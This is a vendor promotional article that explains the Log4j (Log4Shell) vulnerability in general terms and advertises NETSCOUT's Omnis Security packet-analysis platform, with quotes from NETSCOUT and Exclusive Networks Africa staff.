On December 09, 2021, the world was alerted to the Log4j vulnerability [CVE-2021-44228 aka Log4Shell]. It’s likely threat actors were already aware of the vulnerability before then, says NETSCOUT product marketing manager Tom Bienkowski, as the vulnerability was reported to have been exposed much earlier in the Minecraft discussion forums.
How does Log4j work – and what lessons does it provide?
Log4j, which is open source software provided by the Apache Software Foundation, logs errors and routine system operations and sends diagnostic messages about them to system administrators and users. A common example of Log4j is when a user types or clicks on the wrong web link and receives a 404 error message. doesn’t exist, and it also logs this event for server sysadmins using Log4j. In Minecraft, Log4j is used by the server to record activity as total memory used and user commands entered into the console.
Log4Shell works by abusing a feature of Log4j that allows users to specify custom code to format a log message. However, unfortunately, this type of code allows third-party servers to submit software code that can perform all sorts of actions on the targeted computer. This opens the door for threat actors to steal sensitive information and send malicious content to other users communicating with the affected server.
“This vulnerability alerts us that it is time to start paying attention to packet-based exploit investigations,” says Risna Steenkamp, Vendor Alliance Manager for NETSCOUT and Infoblox at Exclusive Networks Africa. “The problem with the Log4j vulnerability was that it could be exploited to download and execute common crypto-mining malware, web shells, Cobalt Strike beacons – and no doubt ransomware.”
Bienkowski notes that, “Scanning and patching your vulnerable servers (if you can find them all) is absolutely the best defense against this exploit. But it takes time – a lot of time. Therefore, it should be assumed that before or during this time, malicious actors have already compromised one or more of your vulnerable servers.
It therefore advocates considering the use of packet-based threat detection and investigation as one of the possible tools to detect and remediate the exploitation of such a vulnerability – an area in which NETSCOUT excels without fail. no doubt.
The challenge of visibility
Steenkamp continues, “In today’s complex network world – encompassing legacy networks, branch offices, home-based work situations, and public and private clouds – getting the right level of network visibility is more difficult than never. The threat surface is expanding and the number of security tools has increased, resulting in siled data. Overall, this means that a lack of comprehensive and consistent network visibility makes it harder for cybersecurity teams to conduct rapid and effective threat detection and response.
“Additionally, when new technologies are implemented quickly to meet business needs, it often means that security is compromised. This approach can limit visibility and create security blind spots, which attract threat agents. How do you protect yourself from threats you can’t see? »
NETSCOUT digs deep into the visibility challenge
NETSCOUT’s solution to this challenge is Omnis™ Security, an advanced threat analysis and response platform that provides comprehensive and consistent network visibility for effective cybersecurity.
NETSCOUT’s patented Smart Data technology provides unparalleled visibility by uniquely converting network packets into an intelligent source of data. NETSCOUT has now integrated this same technology into a cybersecurity solution that provides complete network visibility and more effective detection and response to cyber threats.
About NETSCOUT Omnis Security
Unlike Security Information and Event Management (SIEM), Endpoint Detection and Response (EDR), or User Behavior Analytics (UBA) security technologies, Omnis Security transforms data from packets into real-time threat detection indicators. It provides your team with relevant contextual data, enabling quick and decisive action, smarter investigation, and faster, more accurate remediation, as follows:
- You can identify the deep attack context and quickly assess the scope of the breach to isolate risk.
- You are able to remediate faster and more accurately than using only non-network traffic data sources.
- Vital forensic reports are created, for law enforcement and support of reporting obligations under legislation.
“In the event of a malware attack,” says Steenkamp, ”NETSCOUT Omnis security provides deep visibility into network traffic, including packet-level visibility that can also automatically create a robust set of metadata that gives visibility into all seven layers of the OSI model, and for many different protocols.
“Omnis further provides the ability to continuously capture and store this robust set of packet-based metadata for real-time and retrospective analysis. Additionally, Omnis infuses this packet-based data with multiple sources of threat intelligence, to automatically detect and perform analysis of this data, as well as the ability to perform high-performance decryption.
“While it’s true that you can’t protect yourself from danger you can’t see, it’s also true that in the network security environment, NETSCOUT is uniquely qualified to be your eyes,” she concludes. .
NETSCOUT is distributed throughout Sub-Saharan Africa by Exclusive Networks Africa.
By personal writer.